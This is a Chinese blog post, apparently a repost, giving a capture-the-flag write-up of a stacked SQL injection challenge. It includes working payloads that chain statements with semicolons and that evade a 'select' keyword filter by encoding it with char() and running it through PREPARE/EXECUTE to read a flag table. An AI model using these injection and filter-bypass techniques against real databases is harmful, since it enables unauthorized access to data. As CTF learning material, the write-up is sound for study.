堆叠注入

什么是堆叠注入?

顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。

题目

1417438-20190828203149700-509602448.jpg

首先尝试闭合引号,并注释后面的内容。
1417438-20190828203158119-1882144614.jpg
发现没有报错,那就判断一下有多少列。

1417438-20190828203205155-712309812.jpg
1417438-20190828203208469-876192790.jpg
由此可以判断出有两列,接着判断回显位。

1417438-20190828203212932-610868824.jpg

发现回显了过滤规则,select是被过滤的,还有一些注入常用语句也被过滤了。

这时就可以尝试一下堆叠注入。
1417438-20190828203216627-2064840038.jpg
发现这里爆出了所有数据库,再来看看数据表。
1417438-20190828203247445-874600076.jpg
发现有两个数据表,通过查看表结构看一下哪个表里面有flag字段。
1417438-20190828203252308-1915690827.jpg
1417438-20190828203257420-1125158053.jpg

发现flag字段在1919810931114514表中,接着想办法去读取这个表中的flag字段的值(因为一些常用语句都被过滤了,不能直接查询)。
这里实在不知道怎么办了,于是百度发现大佬的wp用预处理语句绕过了过滤。

预处理语句使用方式:

SET @sql = variable;  //设置变量
PREPARE yuchuli from '[my sql sequece]';   //预定义SQL语句
EXECUTE yuchuli;  //执行预定义SQL语句sqla

这里是将我们要处理的语句先与定义为yuchuli,再进行执行,绕过关键字的过滤,于是就有了如下的语句。

PREPARE yuchuli from 'select * from `1919810931114514`';
EXECUTE yuchuli;

但是这里的select是被过滤的,于是想到可以对他进行编码绕过.

SET @sql = concat(char(115,101,108,101,99,116), " * from `1919810931114514`");
PREPARE yuchuli from @sql;
EXECUTE yuchuli;

1417438-20190828203309368-1493654539.jpg
成功拿到了flag。

转载于:https://www.cnblogs.com/Timesi/p/11426348.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值